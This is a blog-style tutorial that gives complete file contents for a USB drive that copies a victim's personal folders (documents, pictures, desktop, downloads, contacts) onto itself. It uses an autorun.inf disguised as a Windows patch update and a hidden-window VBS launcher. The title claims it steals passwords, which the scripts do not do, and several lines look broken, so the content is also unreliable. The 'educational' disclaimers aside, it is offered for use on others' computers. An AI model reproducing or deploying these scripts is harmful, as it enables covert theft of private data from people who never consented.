How To Create A Hacking Pendrive That Can Steal Password From Any Computer



 How To Create A Hacking Pendrive That Can Steal Password From Any Computer: Everyone knows the meaning of the phrase Hacker. The Hacker word often resembles a guy with a laptop who tries to access unauthorized data. But, to learn about hacking and trying it is not a crime unless you are using your skills to get unauthorized access to any data.

We have already shared several tutorials like how to create a computer keylogger, how to become a hacker etc. Today we are going to share another hacking-related stuff. But, before we proceed, we would like to say, this article is just for an educational purpose. Do not misuse the information otherwise, you may end up having trouble.


Here in this tutorial, we are going to share a trick on how to make a Pendrive that can steal passwords from other computers. This Pendrive can be very useful to check the security level of any computer. I repeat, don’t misuse this tutorial.


How To Create A Hacking Pendrive That Can Steal Password From Any Computer

Things You Will Need:

  • Pendrive
  • Computer/Laptop
  • Notepad/Notepad++(i suggest notepad++)

1) Open a Notepad and then copy the script below and this time save the file as autorun.inf

[autorun]

icon=drive.ico

open=launch.bat

action=Click OK to Run patch update for windows

shell\open\command=launch.bat



2) Now Open a new Notepad and then copy the script below and this time save the file as file.bat

@echo off

:: variables/min

SET odrive=%odrive:~0,2%

set backupcmd=xcopy /s /c /d /e /h /i /r /y

echo off

%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"

%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"

%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"

%backupcmd% "%USERPROFILE%\downloads" "%drive%\all\downloads"

%backupcmd% "%USERPROFILE%\desktop" "%drive%\all\desktop"

%backupcmd% "%USERPROFILE%\documents" "%drive%\all\doc"

%backupcmd% "%USERPROFILE%\music" "%drive%\all\Music"

%backupcmd% "%USERPROFILE%\SOFTWARE" "%drive%\all\soft"

%backupcmd% "%USERPROFILE%\3D Objects" "%drive%\all\3d object"

%backupcmd% "%USERPROFILE%\Contacts" "%drive%\all\contacts"

%backupcmd% "%USERPROFILE%\Links" "%drive%\all\URLS"

%backupcmd% "%USERPROFILE%\Saved Games" "%drive%\all\Games Documents"

%backupcmd% "%USERPROFILE%\Searches" "%drive%\all\Search"

%backupcmd% "%USERPROFILE%\Public Documents" "%drive%\all\documents1"

%backupcmd% "%USERPROFILE%\Public Downloads" "%drive%\all\downloads1"

%backupcmd% "%USERPROFILE%\Public Music" "%drive%\all\music1"

%backupcmd% "%USERPROFILE%\Public Pictures" "%drive%\all\pictures"

%backupcmd% "%USERPROFILE%\Public Recorded TV" "%drive%\all\Recorded TV"

%backupcmd% "comp%\Links\desktop\This PC\PHOTOS" "%drive%\all\PHOTOS 1111"

@echo off

cls



3)  Now Open a new Notepad and then copy the script below and this time save the file as invisible.vbs

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

4) Now Open a new Notepad and then copy the script below and this time save the file as launch.bat

wscript.exe\invisible.vbs file.bat


5) Now move the files Autorun.inf, file.bat, invisible.vbs and launch.bat to your Pendrive.

The tricky thing is whenever you will insert the USB drive into someone’s computer. It will ask you to perform a virus scan. You don't need to worry cz there is no virus exactly. It'll perform as a script. You just need to open your Pendrive and run the file.bat. All the files are copied from your computer to your Pendrive. You'll see the files inside all folder outside of your Pendrive. 

This article is just for educational purposes. So, whenever you suspect someone doing the same thing to you, immediately stop him/her. Hope you like the article, and share it with others also.

Comments

Popular Posts